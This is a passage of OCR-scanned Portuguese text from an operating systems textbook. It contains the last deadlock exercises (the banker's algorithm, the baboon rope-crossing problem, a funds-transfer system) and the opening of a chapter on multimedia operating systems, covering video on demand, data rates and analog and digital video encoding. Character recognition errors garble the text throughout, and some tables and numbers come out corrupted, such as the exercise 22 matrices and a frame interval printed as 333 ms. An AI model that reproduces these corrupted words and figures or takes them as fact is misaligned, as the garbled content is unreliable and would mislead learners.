ser cxecutadas para verifkar a seguranęa dc um estado ć 
proporcional a nriiK Quais sao os valores dc a c h? 


22. Um sistema tem quatro processos c cinco recursos aloca- 
veis. A aloeaęao atual e as necessidades maximas sao as 


seguintes: 

Alocado 

Młbdmo 

Disponml 

Processo A 

10 2 1 1 

112 13 

0 0x1! 

Processo B 

20110 

2 2 2 10 


Processo C 

1 1 0 1 0 

2 13 10 


Processo D 

11110 

11221 



Quał ć o menor valor de x para que esse estado seja se¬ 
guro? 

23. Unia forma de eliminar a espera circular e criar urna re- 
gra que diga que um processo pode milizar somente um 
recurso de cada vez. De um exemplo que mosire que essa 
restrięao ć inacdtavcl na maioria dos casos, 

24. Dois processos, A c B> precisam, cada um, dc tres registros, 
1, 2 e 3, em urn banco de dados, Se A os requisita na or¬ 
deru 1, 2, 3 e B tambem os reąuisita nessa mesma ordem, 
a ocorrencia de impasse nao sera possfvel. No entanto, 
se 5 os reąuisita na ordem X 2 e 1, emao sera possivel a 
ocorrencia de impasse. Com tres recursos, existem 3!, isio 
t sds combinaęoes possiveis que cada processo pode usar 
para ordenar a requisięao de recursos. Qual fraęao de to- 
das as combinaęoes os tara seguramente livre de impasses? 

25. Um sistema distribufdo usando caixas postais tem duas 
primitivasde comunieaęaoernre processos: send e receive. 
A segunda primittva espedfica um processo do qual sera 
recebida urna mensagem, e o processo executor da pri- 
mittva sera bloąucado caso nao ba ja nenhuma mensa- 
gem disponivel mesmo que exisiam men sagę ns a es¬ 
pera, vindas de outros processos, Nao existem recursos 
compartilhados, mas os processos precisam se comunicar 
freąuentemenie sobre outros assuntos. fi possivcl ocorrcr 
impasse? Discuta a questao. 

26. Em um sistema de transferencia elerróniea de fundos, 
existem ccmcnas de processos idćntkos funcionando da 
seguinte maneira: cada processo le unia liuha de entra¬ 
da, qite espedfica detenninada quantia, a conia corren- 
ie a ser creditada c a eon ta eonente a ser dębi ta da. Em 
seguida, etc toina posse de ambas as contas correntes c 
transfere o dinheiro, liberando-as apds a transferencia, 
Quando muttos processos estiverem execurando em para¬ 
lelo, esistira um perigo bastante rcal de um processo que 
estiver de posse da conta corrente xser incapaz de obter 
a conta corrente y, porque esta estara sendo usada por 
outro processo que agora deseja obter a conta corrente x. 
Projete um esquema para evitar impasses nesse sistema, 
jNao libere um registro de conta corrente ale ter conclur 
do as transaęoes. (Em out ras palavras, nao scrao aceitas 
soluęóes que bbąuetem urna conta corrente e liberein-na 
imediataniente se a ontra ja estiver alocada,) 

27. Unia maneira de prevenir impasses e eliminar a condięao 
de posse e espera. No texto foi pro po sto que um ]>rocesso 
deve primeiro liberar quaisquer recursos que ele ja de- 
lenlia (supondo que isso seja possfvelJ antes de requ i si¬ 
tar um novo recurso, Contudo, agindo-sc assim, surge o 
perigo de ele obter um novo recurso, mas perder alguns 
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dos recursos exisientes para proces sos eoncorrentes. Pro- 
ponha unia nieihoria nesse esquema, 

28. Um estudamc de cicncia da eomputaęao que esta deseń- 
volvendo um trabalho sobrc impasses pensa cni eiimina- 
-los usando u ma soluęao bril hanie: ąuando um processo 
requisitar um recurso, ele deve especificar um tempo- 
limite. Se o processo ficar bloqueado em viitude da nao 
disponibilidade do recurso, um temporizador sera acio- 
nado, Se o tempo di mi te for ulirapassado, o processo sera 
Jiberado e tera a permissao de exeeutar noyameme. Se 
voce losse o professor, que nota daria a essa proposta e 
porque? 

29. Explique as diferenęas cutre impasse, livelock e condięao 
de manięao {starvatm). 

30- Cmdcrela c o Principe esiao sc divorciando> Para dividir 
suas propriedades, eles estao de acordo com o seguinte 
algoritmo: todas as manhas, cada um deles podera enviar 
unia cana ao advogado do outro, soliciiando um iłem da 
propriedade, Visto que 3.cva urn dia para as carias serem 
emregues, eles coneordaram que, se ambos descobrircm 
quc pediraiii o mesmo item naqucle dia, uma carta se¬ 
ria enviada no dia seguinte cancelando a requisięao. 
Da propriedade fazem parte o cachorro Woofer, a casi- 
nha de Woofer, o canario Twcctcr c a gaiola de Twceter, 
Os a ni ma i s amam suas casas, de modo qne foi feito um 
acordo: qualquer separata o dc um a nim a 1 e su a casa sera 
invilida, obrigandó que loda a divisao seja reuiieiada do 
zero. Tamo Cinderela quamo o Principe querem Woofer 
desespera da menie, Bem, eles podem sair de ferias (sepa- 
rados), pois cada um programem um computador pessoal 
para iratar da negociaęao. Por que? fi possivel ocorrer 
impasse? E possivel ocorrer inanięao? Discuta a ąuestao. 

31. Um osiadanie com especializaęao em antropologia e em 
ciencia da eomputaęao eomeęou um projeto de pesąuisa 
para venficar se babuinos africanos podem aprender so- 
bre impasses, Ele enconirou um desfiladeiro monianho- 
so profundo c amarrou uma corda em cada ejaremidade 
dele, de modo quc um ba bu ino possa atravessa-3o com as 
ma os na corda. Vartos babuinos podem airavessa-io ao 
mesmo tempo, desde quc na mesma direęao. Quando o 
movimento e para leste e para oeste, os babuinos sem- 
pre alcanęam a corda ao mesmo tempo, resultando em 
situaęao de impasse (os babuinos ficam presos no mcio 


da corda), porque e inipossfvel para um babuino saliar 
sobre o outro quando pendurados sobrc o desfiladeiro* 
Se um babuino quer atravessar o desfiladeiro, ele deve 
verificnr sc nenii um outro babuino esta naquele momen- 
to atravcssando a corda no senlido opos to. Escrcva um 
programa usando semaforos que evitc esse impasse. Nao 
se preocupe com a ąiiantidade de babuinos em moyimen- 
to para leste atrasancło indefinidamente os babuinos em 
moyimento para oeste. 

32, Repita o problema anterior, mas agora evite a condięao de 
inamęao, Quando um babuino que deseja airavessar para 
o leste chega h. corda e encontra babuinos atravessando 
para o oeste, eic espera ale quc a corda esic]a vazia, mas 
nenhum movimcnto rnais pora o oeste e perm i lido a te 
que pelo mertos um babuino tenha atravessado na dire- 
ęao opos ta, 

33. Programe uma simulaęao do algoritmo do banqueim, Scu 
programa deve gerar um ciclo por intermedia de cada 
diente do ban co, solidtando uma requisięao e avaliando 
se ela e segura ou irtsegura, Gcre um arquivo de reąuisi- 
ęóes e decisoes. 

34, Escreva um programa que implememe um algoritmo 
dc detecęao de impasses com multipios recursos de cada 
lipo. Seu programa deve lerde um arquivo as seguimes 
cniradas: o nu mero de proccssos, o nu mero de tipos dc 
recursos, o numero de recursos de cada lipo existeme 
(vetor E), a mairiz aiual de alocaęao C (primeira lin ba, 
seguida da segunda Itnha etc,) c a matrizatual de soltcita- 
ędes R (primeira linlia, seguida da segunda lin ha etc.). A 
saida do scu programa deve indicar se cxislc ou nao um 
impasse no sistema. Caso baja, o programa dcvc cxibir a 
idemificaęao de todos os processos bloqueados. 

35. Esereva um programa que detecte se existe um impasse 
no sistema por mci o de um grało de alocaęao de recursos. 
Sen programa deve ler de um arquivo as seguintes cni ra¬ 
da s: o numero de processos e o numero de recursos. Para 
cada processo, quatro nu me ras devcm ser lidos: o nume¬ 
ro de recursos atualmente alocados ao processo, a iden- 
tificaęao dos recursos alocados, a quantidade dc recursos 
sendo sol i ci ta dos, a idem i li ca ęa o dos recursos solicitados. 
A saida do programa deve indicar se existe ou nao um 
impasse no sistema. Caso baja, o programa devc exibir a 
identificaęao de todos os processos bloąiteados. 
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Capitulo 



Sistemas operacionais multimidia 


Fil mes, videodipcs e musica digitais estao se ternan- 
do, ca da vez mais, meios comuns dc apresentar infamia- 
ęao c entretenimento usando lim computador. Arqnivos 
dc audio c vfdco podcm ser armazenados cm um disco e 
reproduzidos sob demanda. Contudo, suas earactertsticas 
san muito diferentes dos rradicionais arqulvos de iexto para 
os quais foram projetados os atuais sistemas de arquivos, 
Como consequenda r sao necessarios novos tipos de siste¬ 
mas de arquivos. Mais ainda: o armazenamento e a repro- 
duęao de audio e vtdeo impoem novas exigencias ao esea- 
bu a do r e tambem a outras part es do sistema operacional. 
Nas próximas seęoes, estudaremos vańos desses lópicos e 
suas implicaęoes em sistemas operacionais projetados para 
tratar multimidia. 

Normalnienie, filmes digilais sao cliatnados multimi- 
dia, que li terał nieme significa mais de um meio. Por essa 
definięao, este livro e um trabalho multimidia. Afinal o 
livro utiliza dois meios: texto e imagens (figuras). Gontu- 
do, a maioria das pessoas usa o termo 'multimidia' para 
um documento que contenha dois ou mais meios continuos, 
ou seja, meios quc devem ser reproduzidos duranie algum 
intervalo de tempo. Neste Iivro, usaremos o termo mu Ili’ 
midia nesse setitido, 

Outro termo um tamo ambtguo e 'vfdco', No semido 
tecnico, video ć apenas um conjunto dc imagens de um 
hlmc (difercTitc dc um conjunto dc sous). Na vcrdadc, c 
coinum enconirar cameras c ielcvisores com dois conecio- 
res, um roni lado como 'video' e outro retu lado como 'au¬ 
dio', ja que os sinais sao separados. Coruudo, a expressao 
Wideo digitaP normalnienie se rdere ao produto comple- 
to, tamo com imagem quanto com som. A seguir, usare¬ 
mos o termo 'filme' para o produto com pieto. Observe 
que um filme, nesse scutido, na o tem necessariamente 
duraęao dc duas horas nem foi produzido por um estudio 
dc Hollywood a um custo ma lor que o dc um Boeing 747. 
Um clipe de notfcias de 30 segundos irazido da pagina 
da CNN pela internet tambem e, por essa definięao, um 
fil mc, Empregarcmos o termo wideoclipes' quando nos 
rderirmos a filmes muito curtos. 



Introduęao a multimidia 


A mes dc tra tarmoś da tecnologia multimidia, talvez 
sejam litcis algumas palavras sobre suas aplicaęoes atuais c 
futuras. Em um linko computador, multimidia multas vc- 


zes significa reproduzir um filmepre-gravado dc um DVD 
(digital wrsatile di$k }. Os DVDs sao discos ópticos que u sam 
o mesmo substrato de policarbonaio (piąstko) dc 120 mm 
dos CD-ROMs, mas sao gravados cm urna densidade mais 
aha, o que resulta em urna capacidade entre 5 GB e 17 GB, 
dependendo do formato* 

Dois candidatos es ta o competindo com o DVD. Um de- 
Ics ć o Blu-ray, capaz dc armazenar 25 GB no format o 
ca mada simples (e 50 GB no forma to dupla ca mada). O 
outro e o HD DVD, que armazena 15 GB (camada sim- 
pies) ou 30 GB (camada dupla). Gada formato e apoiado 
por um consorcio diferente de empresas de compntadores 
e filmes, Aparentcmentc, os setores eletronicos e de entre- 
tenimento sentiram saudades da guerra de fonnatos das 
dccadas dc 1970 c 1980 entre os formatos Betanxax c VHS 
c dcckliram repet!da. E dam quc a nova guerra vai atrasar 
por a nos a popularizaęao dc ambos os sistemas, ja quc os 
consumidores precisamo esperar para saber qual formato 
saira vcncedor, 

O utrą aplicaęao de multimidia e a transfercncia dc vi- 
dcoclipcs pela Internet. Mu i t as paginas da Web tem itens 
que podcm ser clicados para transferir peąucnos lii mes, 
Siles como o YouTube dispoilibilizam milhares de videodi- 
pes. Gon brnie as lecnologias dc diśtribuięao mais rap i das, 
como TV a cabo e ADSL {asymmetńc digitcil subscriher linę — 
linlia digital assimetrica do assinante), sao mais ampla men¬ 
ie empregadas, a preseoęa de Wdeoclipes na internet cres- 
c er a ve i ligi n osa men te, 

Outra area que requersuporte a multimidia ea criaęao 
dos próprios vfdeos, Existem sistemas de ediqao multimt- 
dia quc, para um melhor desempenho, precisam executar 
em um sistema operadonal que de conia tamo do trabalho 
multirmdia ąuanto do trabalho convencional. 

Ha ainda uma outra ar ca na qual a multimidia esta 
se tornando import antę: os jogos para compntadores. Jo- 
gos muitas vezes executam videoclipes para exibir algum 
tipo de aęao. Em geral, os clipes sao curtos, mas ha niuitos 
deles, e clipes espedheos sao dinamicamente selecionados, 
dependendo das aędes do usuario. Esscs jogos estao ca da 
vcz mais sofisticados. E daro quc o jogo cm si pode gerar 
milhares dc ammaęocs, mas o gcrenciamento de vtdcos ge^ 
rad os por pr ogra mas c diferente do de filmes. 

Por fim, o grandę objetivo do mundo multimidia e o 
video sob demanda {vuko on demand), que iniplica a ca- 
pacidade de um consumidor, em casa, selecionar um fil nie 
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usando o controle remoio do televisor (ou o mouse) e ter 
esse filme imediatamente exibłdo na tela de sua televisao 
(ou no monitor de sen computador). Para viabilizar o vfdeo 
sob demanda e nccessaria urna infraestmtura espedal. Na 
Figura 7.1, vemos duas dcssas infra estru tu ras. Cada unia 
tcm trcs componcntcs csscnciais; um ou mais scn/idorcs 
dc yideo, u ma rcde de distribuięao c u ma caixa digital (sd- 
■top hox) cm cada casa para de cod i fi tar o sinal O seryidor 
de video e um computador potemte quc armazena muitos 
fil mes em seu sistema de arqmvo$ e os rep rod u z sob de¬ 
manda. Algumas vezes, computadores de grandę porte sao 
usados como servidores de vfdeo, pois conectar, digainos, 
mil discos de grandę capacidade a um computador de gran¬ 
dę porte e perfeitamente possivel, ao passo que conectar 
mil discos a um computador pessoal e um próbie ma serio. 
Grandę parte do materia! das próximas seęoes aborda ser- 
vidorcs dc vidco c seus sistemas operacionais. 

A rede de disti ibuięio emre o usuario e o servidor de 
video deve ser capaz de transmitir dados em altas taxas e 
em tempo real. O projeto desse tipo de rede e interessante 
e complexo, mas nao penence ao escopo desie livm Na o 
falaremos mais nada sobrc isso, a nao ser para obscrvar 
que essas rcdes semprc usam fibras ópticas do semdor de 
vfdeo ale urna caixa de junęao que serve uma regiao em 
que os consnmidores residem. Nos sistemas ADSL, que sao 


fornecidos pelas companhias telefonicas, a linha de telefo- 
ne por par tranęado existente serve o ultimo ąuilómetro 
(ou ąuase isso) de transmissao. Nos sistemas de TV a cabo r 
explorados por operadoras, a fiaęao exisiente de IV a cabo e 
usada para a distribuięao local. A ADSL tern a vantagem 
dc ofcreccr a cada usuario um canal dedicado c, assim, ga¬ 
ra nlir a largura de banda. No entanto, a largura dc banda 
ć baixa (algims megabits/s) por causa das liniitaębes das 
linbas tdeEonicas. a Tv a cabo usa cabo coaxial de alta lar- 
gura de banda (em gigabits/s), mas muiios usuarios tern de 
compartilhar o mesmo cabo, resuliando em unia disputa 
e em urna largu ra de banda sem gara mi as para o usuario. 
Em re tamo, para competir coiu as empresas de TV a cabo, 
as operadoras telefonicas estao comeęando a utilizar fibra 
ótica nas residencias e, assim, viabilizando que a ADSL te- 
nha urna Inrgura dc banda inaior do quc a do cabo. 

A ultima peęa do sistema e a set-top box, ou seja, 
aotide chega o ADSL ou a TV a cabo. Esse dispositivo e, 
na verdade, um computador norma], com certos chips es- 
peciais para decodificaęao e descompressao de vfdeo. No 
mimmo, esse tipo de aparelho contem CPU, RAM, ROM e 
a imcrface para ADSL ou para o cabo. 

Urna ;alternativa a set-top box e usar o computador 
pessoal do consumidor t exibir o fil me no monitor. Curio¬ 
sa menie, a razao para usar a set-top box — dado que a 



Seryidor de video Par * r anęado de cobre 


(a) 



Cabo coaxral da TV a cabo 


(b) 


I Figura 7.1 Video sob demanda utilizando diferentes tecnologias de distribuięao, (a) ADSL. (b) TY a cabo. 
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maioria dos consumidores provavdniente ja tem um com¬ 
putador — e que as operadoras de video sob demanda es- 
peram que as pessoas queiram assistir aos filmes eni suas 
salas de estar, que normalnienie possuem inna televisao # 
mas raramente um computador, De urna pcrspectiva tćcni- 
ca, usar um computador pcssoal c na o urna set-top box 
tem mais sentido, pois o computador ć muito mais poten- 
te, tem um grandę disco rigido c urna tela com resoluęao 
nutko maisaka, De qualquer modo, mukas vezes fareinos 
urna disdnęao entre oservidor de vfdeo e o processo cliente 
no usuario finał, que de co di (i ca e exibe o fi lnie. Contudo, 
em termos de projeto de sistema, nao importa muito se o 
processo cliente executa em urna set-top box ou em um 
PC. Para um sistema de edięao de vtdeo, todos os processos 
executam na mesma maquina, mas continuaremos mlii- 
zando a terminologia de semdor c cliente para deixar daro 
o quc cada processo esta fazendo. 

Yokando a mullimfdia em si: ha duas caracterfsticas 
fundamentais que devem ser muito bem entendidas para 
trata-la adequadanieme: 

1. Mullimfdia usa taxas de dados extremanieme altas. 

2. Mullimfdia requer reproduęao em tempo real 

As altas taxa$ de dados resultam da natureza da intor- 
maęao visual e acustica* Os olhos e os ouvido$ podem pro¬ 
ce ssar guamidades prodtgiosas de informaęao por segundo 
e devcm ser alimentados oessa taxa para produzir urna ex- 
periencia sensorial aeeitavel As taxas de dados de algumas 
fomes digitais multimfdia e de certos dispositivos comuns 
de hardware sao apresemadas na Tabela 7.1. Discutiremos 
alguns desses format os de codificaęao posteriormeme nes- 
te ca pi tul o. O que se deve observar e a alta taxa de dados 
que a multimidia requer, a necessidade de compressao e a 
quanlidade necessaria de memória. Por exemplo, um fi lnie 
HDTV de alra definięao e sem compreensao de duas ho ras 
ocupa um arqulvo de 570 GB* Um servidor de vfdeo que ar- 
niazene mil desses filmes precisa de um espaęo em disco de 
570 TB, ou seja, urna quantidade incomum para os padroes 
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atuais. Deve-se observar tambem que, sem a compressao 
de dados, o hardware atual nao consegue acompanhar as 
taxas de dados produztdas. Estudaremos a compressao de 
vidco ainda nestc capftulo. 

A seguuda exigencia que a mullimfdia hnpoe sobre um 
sistema e a necessidade da entrega de dados em tempo real. 
A poręao vfdeo de um filme digital consiste em alguns qua- 
dros por segundo. O sistema NT SC, usado na America do 
Norie, America do Sul (execto o Brasil) e no Ja pa o, executa 
cm 30 quadros/s (29,97 para os puristas); ja os sistemas 
PAL c SEC AM, usados em grandę parte dos dcmais paf- 
ses (no Brasil usa-sc PAL/Mg ex ecu tam cm 25 quadros/s 
(25,00 para os puristas). Os quadros devcm ser entregues 
em imervalos predsos de 333 ms ou 40 ms, respectlva- 
mente; do omtrario, a imagem parecera fragment a da 

OfidaJmcntc, NTSC ć a sigla para National Tdcvision 
Standards Committec (Comissao Nadonal para Padroes 
Tclevisivos), mas o modo prccario como a cor foi irata- 
da no padrao ąuando a lelevisao em cores foi iiweniada 
gerou unia piada no meio industrial de que, na verdade, 
NTSC significaria never twice the same coior (ou, em portu- 
gues, Nunca Duas Yezesa Mesma Cor). PAL significa pkase 
aliernathnj Une (linha de fasę alternaiue). Tecnicameruc, e 
o mdhor dos sistemas, SEC AM e usado na Franęa (e foi 
iiiYcntado para proteger os fabricanlcs franccscs dc TV da 
eon co rre n da estrangeira) e signifka seąumtid coukuy avec 
mmoire. O sistema SECAjM tambem e usado na Europa 
Oricnlal porque P quando a televisao foi introduzida la, os 
governos comunistas da epoca queriam evitar que o povo 
assistisse a televisao a lenia (PAL) e, por isso r escolheram 
um sistema incompatwel. 

Nos scres humanos, os ouvidos sao mais senstveis que 
os olhos; portanto, urna variaęao de ate me sino alguns mi- 
lissegundos na exibięao sera notada. A vanabilidade nas 
taxas de entrega e cliamada jitter e deve ser estritamente 
limitada para obter um bom desempenho. Observe qoe o 
jitter nao e o mesmo que a traso* Se a rede de disiribiiięao 


Fonte 

Mbps 

GB/h 

Telefone (PGM) 

0,064 

0,03 

Musica (MP3) 

0,14 

0,06 

CD de audio 

1,4 

0,62 

Rlme(MPEG-2, 640 x 480) 

4 

1,76 

Camera de video digital (720 x 480) 

25 

11 

TV nao compactada 
(640 x 480) 

221 

97 

HDTV nao compactada 
(1.280 x 720) 

648 

288 


Dispositivo 

Mbps 

Fast Ethernet 

100 

Disco Eide 

133 

Rede ATM GC-3 

156 

IEEE 1394b (FireWire) 

800 

Gigabit Ethernet 

1.000 

Disco Sata 

3.000 

Disco SCSI Ultra-640 

5.120 


I Ta be la 7 A Algumas taxas de dados para dispositivos de E/S rnuitimidia e de alfo desempenho. Obsen/e que 1 Mbps e iguai a 10 C 
bits/s, mas 1 GB e iguai a 2 W bytes. 
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da Figura 7.1 atrasar u ni for mement e lodos os blts por exa- 
tamente 5.000 s, o fil me eomeęara um po u co mais tarde, 
mas sera visto perfeitamenie. Por ouiro lado, sc os quadros 
forem aleatoriamente atrasados entre 100 e 200 ms, o lil- 
mc sc parcccra com um vcllio fil mc dc Charlie Chaplin, 
nao importa quem csteja estrdando. 

As propriedades de tempo real necessarias para repro- 
duzir multimidia dc mancira aceitavcl sao muitas vczcs 
representadas por parametros dc ąuatidade de $ervięo. 
Emre esses parametros estao largura dc banda media dis- 
pomvel, pico de largura dc banda dispomvd, atraso iih- 
nimo e niaximo (que combinados ddimitam o jitter) e a 
probabilldade dc pcrda dc bit. Por exemplo, u ma opcrado- 
ra dc rcdc pode ofercccr um scrvięo garantindo urna lar¬ 
gu ra de banda media dc 4 Mbps, 99 por cento dos atrasos de 
transmissao no intervaio de 105 a 110 ms e uma taxa 
de perda de bit de 10 _io , que seria adequada para iilmes 
MPEG-2. A operadora tamboru poderia oferecer um servi- 
ęo mais barato c de rnenor ąualidadc com uma largura dc 
banda media de 1 Mbps (por exemplo, ADSL). Nfesse taso, 
a qualidade da rep rodu ęa o seria comprometida de algo ma 
maneira, provavdmente reduzindo a resohięao e a taxa de 
ąuadros ou descartando a iiiformaęao de cor, exibindo o 
fil me cm preto e branco. 

G modo mais coniuin de fornecer garantiasde qualida- 
de de scrvięo e resenar capacidade antecipadamente para 
cada novo cliente. Os recursos resmados podem ser uma 
poręao do uso da CPU, buffers dc memória, capacidade dc 
transferencia do disco e largura de banda de rede, Se um 
novo dienie clicga e quer assistir a um fil me, mas o servi- 
dor dc vtdco ou a rcdc avaliam (pic nao ha capacidade su¬ 
fi ciem c para mais um clientc, e necessario rejeitar o novo 
diente para cvitar a dcgradaęao do servięo para os clicntes 
a mais. Como conseąuencia, os sm idores multimidia pre- 
cisam dc esąucmas de rcscrva de recursos c um algoritmo 
para corttrole de admissao para decidir quando podem 
Udar com mais trabalho. 



Arquivos multimidia 


Na maiona dos sistemas, um arquivo de tcxto eomum 
e forma do por uma seąućncia dc byles sem qualqucr estru - 
tura que o sistema operadonal possa reconiiccer ou com 
da sc importan Com a multimidia, a situaęao e rnais co.m- 
plicada. Para comeęar, video e audio sao eompletamente 
diteremes. Eles sao capturados por dispositivos es pe ci fi cos 
(chip de CCD ver$us microfone), possuem estruuiras imer- 
nas diferentes (o video tern 25-30 quadros/s; o audio tern 
44.100 amostras/s) e sao reproduzidos por dispositivos di¬ 
ferentes (monitor wnuś ako-falante). 

AJem disso, a maioria dos filmes de Hollywood alme- 
ja agora uma audienda mundial que, na sua maioria, nao 
fala inglćs. Jsso pode ser resolvido dc duas maneiras. Para 


alguns pafses, e produzida uma irilha sonora adicional com 
as vozes dubiadas no idioma Jocal (contudo, sem os efeitos 
sonoros). No Japao, todos os tclevisores tern dois canais 
dc som para possibilitar ao espectador ouvir os filmes es- 
uangeiros no idioma odginał ou em japones. Ha um botao 
no comrole remoto para selecionar o idioma, Em outros 
paises, e usada a tri Ilia sonora original com legenda s no 
idioma iocal. 

Aleni disso, muitos fi3mes e programas dc TV hojc for- 
necem legendas cm closcd-capthn (drcuito fcchado) tam- 
bem em ingles, para possibilitar qtie fala mes do ingles com 
deficiencia auditiva possani assistir ao fiime. O resultado e 
que um fiime digital pode, na verdade, ser forma do por va- 
rios arquivos: um arquivo de vfdeo, multiplos arquivos de 
audio e divcrsos arquivos de tcxlo com legendas cm v a rios 
idiomas. Os DVDs consegucm armazenar atć 32 idiomas 
e arquivos dc legendas. Um conjunto simpies de arquivos 
multimidia e iiustrado na Figura 7.2. Exp3icaremos osigni- 
flcado dc avanęo rapido {fastforward) e do rctroccsso rapido 
{fast baekward) posteriormentc neste capftulo. 

Como consequencia, o sistema de arquivos precisa 
manier o comrole sobie multiplos 'subarquivos' por ar- 
quivo. Um posstvel esquema e gerenciar ca da subarquivo 
como um arquivo tradicional (por exemplo, usando um 
i-node para monitorarseusblocos) e ter uma nova esiruiura 
de dados que rclacione lodos os subarquivos de um arqui- 
vo multimidia. Outro modo e invcntar um tipo de i-nodc 
bidimcnsionaJ, cm que cada coluna rdaciona os blocos dc 
cada subarqtiivo. Em geral, a organizaęao dcvc possibilitar 
ao espectador cscolhcr dinamicamcmc qual Irilha de audio 
e qual legenda tssar no momento em que o fiime for visu>* 

Em cada caso, tambem c necessario manier os subar- 
quivos sincroiiizados para que, ao ser reproduzida, a trilha 
de audio selectonada perrnaneęa sineronizada com o video. 
Quando o audio e o v(deo ficam um pouco fora dc sinero- 
nia, o espectador pode ouvir as palavras dc um ator a mes 
ou depois dc seus labios se niovcrcm, o quc c fadlmentc 
pcrcebido c bastante incomodo. 

Para entender nielhor como os arquivos multimidia 
sao organizados, e necessario entender como o audio e o 
video funcionam em certos detalhes, 

7.2.1 I Codificaęao de video 

O olho humano funciona do seguinte modo; ao atingir a 
retina, urna imagem c retida por alguns milissegundos antes 
de desaparecer. Se uma seąućncia de irnagens a lingę a reti- 
na cm 50 ou mais imagcns/s r o olho nao percebe que estao 
sendo exibidas imagens discretas. Todos os sistcinas dc ima- 
gensem nif>vuneniobaseados cm fiime ou em vfdeo upio¬ 
ra m esse principio para produzir imagens em movimento. 

Para entender sistemas de video, e nielhor come^ar 
com a simpies c antiga tdevisao cm preto e branco. Para 
representar a imagem bidimensional na tela da tdevisao 
como uma funęao unidimcnsional da voltagcm cm rdaęao 
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Audio em ingles 
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Legendas em ingles 1 

| Hełlo, Bob 

Helio, Alice 

Mice day 

Surę is 

How are you 
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And you | 

Good 
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Dag. Alice 

| Wlocie dag | 
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Retrocesso rapido 






























I Figura 7.2 Um film© pode ser formado por diyersos arquivos* 

ao tempo, a camera percorre um feuce de eletrons rapi- 
damcnie dc um lado para outro da imagem e lentartien- 
te de dma para bako, regisirando a intensidade luminosa 
conforme sen percurso. No finał da varredura, cha ma da de 
quadro, o feke voita a origeni da tda ( retmee ), Essa Ln- 
tensidadc como u ma funęao do tempo c transmitida pdas 
emissoras de TV e os rcceptorcs repet em o processo de var- 
redura para reconstruir a imagem. O padrao dc varrednra 
usado, tamo pela camera quanto pelo receptor, 6 mostrado 
na Figura 7.3. (A titulo de observaęao, as ca me ras CCD fa- 
zem integraęao em vez de varredura, mas algumas cameras 
e todos os monitores CRT reałizam varredura.) 

Os parametros exatos de varredura variam de pais para 
pais, O NTSC tein 525 linhas de varredtira, uma relaęao 
liorizontal para vertical dc 4:3 e 30 quadros/s (na verdade, 
29,97 quadro$/s). Os sistemas curopcus PAL e SEC AM tern 
625 linhas, a mesma relaęao liorizontal para vertical de 4:3, 
e 25 quadros/s. Em ambos os sistemas, algumas linhas do 
topo c de bako da imagem nao sao exibidas (para apmxi- 
mar de urna imagem retangular nos CRTs, originaImente 
arredondados). Somcntc sao mostradas4S3 das 525 linhas 
de varrcdnra NTSC (c 576 das 625 linhas de varrcdura 
PAL/SECAM). 

Embora 25 quadros/s sejam suficientes para capturar 
movimentos suaves, nessa taxa de ąuadros mnitas pessoas, 
cspcdalmcntc as mais idosas, perccbcrao que a imagem tre- 
mula (porquc a imagem anterior desaparcceu da retina an- 
tes que unia nova aparecesse). Em vcz de aumentar a taxa 
de ąuadros, o quc reąuereria usar mais da escassa largura 
de banda, fol adotada urna abordagem diferente. Em vez 
de mostrar todas as linhas de varredura em ordę ni de ci ma 


para bako, primeiro sao cxibidas todas as Linhas dc varre- 
dura impares c depois sao exibidas as linhas pares* Cada ttm 
desses rneio--qtiadros ć cha mado tle campo. Experimcntos 
mosiraram quc as pessoas percebem a trcmulaęao cm 25 
quadros/s, mas nao a percebem cm 50 campos/s, Essa tecni- 
ca ć cha mada dc en trel a ęa men to. A idevisao ou o vtdeo 
que nao sejam emrcteęados sao chamados dc progressivos. 

O video em cores usa o mesmo padrao de varredura do 
monocromatico (preto e branco), só que, cm vez de mos- 
trar a imagem com um fcixc cm movimcnto, sao emprega- 
dos tres fekes movendo-se em umssono. Gru feke e usado 
para cada urna das irćs cores pnmarfas: vermellio, verdc c 
azul (RGB — red # green e blue). Essa tecnica funciona por- 
que qualqucr cor pode ser constnuda a parlir da superposi- 
ęao linear do vermelho, do yerde c do azul, com as devidas 
iutensidades, Contudo, para transmitir cm um unicocanal, 
os tres sinals dc cores dcvem ser combinados cm um unico 
sina! composto. 

Para permitir que as transmissóes em cores sejam vis- 
las em reccpiores em preto c branco, lodos os tres siste- 
mas combinam linearniente os sinais RGB cm um smal de 
luminancia (brilho) c dois sinais de crominancia (cor), 
embora todos des usem coeficicntcs diferentes para eons- 
truir esses sinais a partir dos sinais RGB. O interessante e 
quc o olho e rnuiio mais senskel ao sinal dc luminancia 
do quc aos sinais dc crominancia e, portanto, estes ultimos 
nao precisam ser transmitidos de modo tao preciso. Conse- 
ąuentemente, o sinal de luminancia pode ser iransmitido 
na mesma frequenda do velho sinal em preto e branco e, 
asshn, ser rcccbido nos idev[sorcs em preto e branco. Os 
dois sinais dc crominancia sao transmitidos em bandas es- 
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O pró^imo campo Linha de varredura 



I Figura 7.3 O padrao de varredura utilizado pelo vi r deo NTSC e pefa TY 


treilas nas frcąucntias mais altas. Algims tełcvisores tem 
botoes dc ajustc ou controlcs rotulados como brilho, matiz 
e saturaęao (on brilho, tonalidade c cor} para controlar es- 
ses fres sinais separada menie. Os eon cci t os dc luminancia 
c crominancia san neccssarios para enlender como a com- 
pressao de vfdeo lunciona. 

Ale aqui vimos o vfdeo analógico. Agora nos voltare- 
mos para o vfdeo digitaK A representaęao mais sini pies de 
video digital e unia seąuenda de quadros f cada um cons- 
u tu (do dc unia gra dc retangukir dc dementos de imagem 
ou pixels. Para video em cores, sao usados 8 bits por pi- 
xd para cada unia das cores RGB, resuhando em 2~ Ą ~ 16 
milhoes de cores, o que ć sufi ci cnie* O olho hu mano nao 
consegue nem mesmo distinguir essa quantidade de cores, 
o que dira mais que isso. 

Para produzir movimentos suaves, o vfdeo digital, as- 
sim como o yfdeo analogi co, deve most rai pelo me nos 25 
quadros/s. C on md o, como os bons monitores dos compnta- 
dores atuais pcrcorrem a Lela aiualizando as imagem arma- 
zenadas na RAM de vfdeo 75 vezes por segnndo ou mais, o 
entrelaęamento nao e necessario. Consequentememe r lodos 
os monitores de computadores u sam varredura progressiva. 
Apcnas redesenhar (isto ć, rcnovar) o mesmo ąuadro tres 
vezesem uma linha e sufidente para eliminar a tremulaęao. 

Em on tras palavras, a suavidade do movimento e de- 
lenninada pdo numero de imagens difemites por segtmdo, 
cnąuanto a tremulaęao e estipulada pdo numero de vezcs 
que a lela e desenhada por segundo. Esses dois para me¬ 
tro s sao diferentes. Uma imagem parada desenhada a 20 
quadros/s nao mostrara movimemos espasmódicos, mas 
